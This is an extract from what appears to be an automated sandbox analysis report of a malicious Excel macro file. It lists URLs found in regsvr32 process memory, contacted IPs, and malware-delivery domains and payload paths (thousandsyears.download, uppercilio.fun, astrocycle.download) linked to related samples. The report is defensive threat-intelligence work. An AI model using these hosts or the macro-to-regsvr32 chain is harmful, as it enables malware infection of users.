                                                                  http://crl.sca1b.amazontrust.com/sca1b.crl0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://amazon.com/=be&)regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                    		high
                                                                    https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2099791165.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2107057604.0000000001CB0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114750250.0000000001D90000.00000002.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        https://aws.amazon.com/th/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.windows.com/pctv.regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            https://a0.awsstatic.com/pricing-calculator/js/1.0.2regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://a0.awsstatic.com/plc/js/1.0.112/plcregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://amazon.com/regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmpfalse
                                                                                    		high
                                                                                    https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.pngregsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://aws.amazon.com/search/regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credentialregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://aws.amazon.com/fr/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobileregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://aws.amazon.com/vi/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.twitch.tv/awsregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://aws.amazon.com/marketplace/?nc2=h_ql_mpregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://aws.amazon.com/searchregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://a0.awsstatic.com/libra/1.0.385/libra-head.jsregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2100967388.0000000002E90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108703125.0000000002E30000.00000002.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://a0.awsstatic.com/da/js/1.0.47/aws-da.jsregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://aws.amazon.com/tw/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://console.aws.amazon.com/?nc2=h_m_mcregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://o.ss2.us/0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://aws.amazon.com/search/?searchQuery=regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://amazon.com/uregsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://aws.amazon.com/privacy/?nc1=f_prregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://aws.amazon.com/pt/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://aws.amazon.com/jp/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://aws.amazon.com/regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://amazon.com/(be&)regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.jsregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://ocsp.entrust.net03regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://aws.amazon.com/jp/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://crt.rootg2.amazontrust.com/rootg2.cer0=regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://aws.amazon.com/pt/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://aws.amazon.com/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.htmlregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://aws.amazon.com/es/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.2102806055.0000000003467000.00000002.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://d1.awsstatic.comregsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://aws.amazon.com/de/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://investor.msn.com/regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://aws.amazon.com/id/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.pngregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://www.%s.comPAregsvr32.exe, 00000003.00000002.2100967388.0000000002E90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108703125.0000000002E30000.00000002.00000001.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              		low
                                                                                                                                                                              https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=defaultregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://a0.awsstatic.comregsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://ocsp.entrust.net0Dregsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=ficoregsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high

                                                                                                                                                                                    Contacted IPs

                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                    Public

                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    172.67.198.51
                                                                                                                                                                                    		thousandsyears.downloadUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    13.224.92.73
                                                                                                                                                                                    		dr49lng3n1n2s.cloudfront.netUnited States
                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                    104.21.55.83
                                                                                                                                                                                    		uppercilio.funUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    104.21.37.209
                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                                                                    172.67.213.115
                                                                                                                                                                                    		astrocycle.downloadUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                                                                    172.67.194.117
                                                                                                                                                                                    		voopeople.funUnited States
                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                    General Information

                                                                                                                                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                                    Analysis ID:444685
                                                                                                                                                                                    Start date:06.07.2021
                                                                                                                                                                                    Start time:15:11:25
                                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 7m 32s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Sample file name:Purchaseconfirmation-137606.xlsm
                                                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                    Number of analysed new started processes analysed:7
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • HDC enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.expl.evad.winXLSM@7/8@15/6
                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                    HDC Information:
                                                                                                                                                                                    • Successful, ratio: 71.8% (good quality ratio 54.4%)
                                                                                                                                                                                    • Quality average: 60.1%
                                                                                                                                                                                    • Quality standard deviation: 41%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 82%
                                                                                                                                                                                    • Number of executed functions: 32
                                                                                                                                                                                    • Number of non-executed functions: 3
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                                                    • Scroll down
                                                                                                                                                                                    • Close Viewer
                                                                                                                                                                                    Warnings:
                                                                                                                                                                                    Show All
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                    Simulations

                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                    No simulations

                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                    IPs

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    172.67.198.51DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                    PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                    13.224.92.73DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      104.21.55.83DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                      104.21.37.209DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • astrocycle.download/
                                                                                                                                                                                      172.67.213.115DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • astrocycle.download/
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • astrocycle.download/

                                                                                                                                                                                      Domains

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      astrocycle.downloadDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.213.115
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.213.115
                                                                                                                                                                                      dr49lng3n1n2s.cloudfront.netDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.4.74
                                                                                                                                                                                      f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
